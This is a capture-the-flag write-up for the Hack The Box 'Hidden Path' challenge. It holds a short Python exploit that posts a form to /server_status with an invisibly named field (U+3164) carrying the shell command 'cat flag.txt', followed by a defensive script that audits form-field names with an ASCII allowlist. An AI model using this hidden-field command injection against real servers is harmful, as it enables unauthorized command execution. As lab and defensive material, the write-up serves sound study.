https://app.hackthebox.com/challenges/718

Description

Legends speak of the infamous Kamara-Heto, a black-hat hacker of old who rose to fame as they brought entire countries to their knees. Opinions are divided over whether the fabled figure truly existed, but the success of the team surely lies in the hope that they did, for the location of the lost vault is only known to be held on what remains of the NSA’s data centres. You have extracted the source code of a system check-up endpoint - can you find a way in? And was Kamara-Heto ever there?

Exploitation

#!/usr/bin/env python3
# Sends the crafted form to the /server_status endpoint and prints the response.
from requests import post
import sys

if len(sys.argv) < 2:
    print(f"Usage: python {sys.argv[0]} <ip:port>")
    sys.exit(1)
URL = f'http://{sys.argv[1]}/server_status'
params = {
    'choice': 6,
    # U+3164 (HANGUL FILLER) renders as blank, so this field name is invisible.
    '\u3164': 'cat flag.txt'
}
r = post(URL, data=params)
print(r.text)
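As an added defender-side example (not part of the original writeup, and not the challenge's server code, which this page does not show), the script below audits decoded form-field names with an ASCII allowlist, reports any non-ASCII or invisibly rendering code points for logging, and shows why a check built only on Python's Unicode-aware `str.isalpha()` is not enough: U+3164 HANGUL FILLER is a letter (category Lo), so `isalpha()` accepts it. The sample requests are constructed; the second one reuses the field names from the exploit above. Function names and the 32-character name limit are assumptions for illustration.

```python
import re
import unicodedata

# Constructed sample input: decoded form fields as a handler would receive them.
# The second request mirrors the writeup's payload: an ordinary 'choice' field plus
# a field whose name is the invisible U+3164 HANGUL FILLER. The third appends a
# zero-width space (U+200B, category Cf) to an otherwise ordinary name.
SAMPLE_REQUESTS = [
    {"choice": "6"},
    {"choice": "6", "\u3164": "cat flag.txt"},
    {"choice": "6", "debug\u200b": "1"},
]

# Assumed policy: field names are 1..32 characters from [A-Za-z0-9_] only.
FIELD_NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def naive_name_ok(name: str) -> bool:
    """A name check relying on Python's Unicode-aware predicate.

    U+3164 has general category Lo, so isalpha() returns True for it even
    though the character renders as blank.
    """
    return name.isalpha()


def strict_name_ok(name: str) -> bool:
    """ASCII allowlist: only names matching [A-Za-z0-9_]{1,32} are accepted."""
    return FIELD_NAME_RE.fullmatch(name) is not None


def suspicious_chars(name: str) -> list[str]:
    """List code points in a field name that are non-ASCII or belong to
    categories that render invisibly (format, separator, control).

    Meant for logging and alerting, not as the sole blocking decision.
    """
    out = []
    for ch in name:
        cat = unicodedata.category(ch)
        if ord(ch) > 0x7F or cat.startswith(("Cf", "Z", "Cc")):
            label = unicodedata.name(ch, "<unnamed>")
            out.append(f"U+{ord(ch):04X} {label} ({cat})")
    return out


def audit(request: dict) -> dict:
    """Classify one decoded form: names the strict allowlist rejects, the
    suspicious code points in each, and which rejected names a naive
    isalpha() check would still have accepted."""
    rejected = [n for n in request if not strict_name_ok(n)]
    return {
        "rejected": rejected,
        "naive_would_accept": [n for n in rejected if naive_name_ok(n)],
        "findings": {n: suspicious_chars(n) for n in rejected},
    }


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(audit(req))
```

The allowlist is the control; the `suspicious_chars` report is what you would ship to a log or SIEM so that a request carrying an invisible field name is visible to the analyst even though it never reaches the handler.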

Summary

Hidden Path: reduce the custom rules to a scriptable check and use the smallest reliable path to the flag.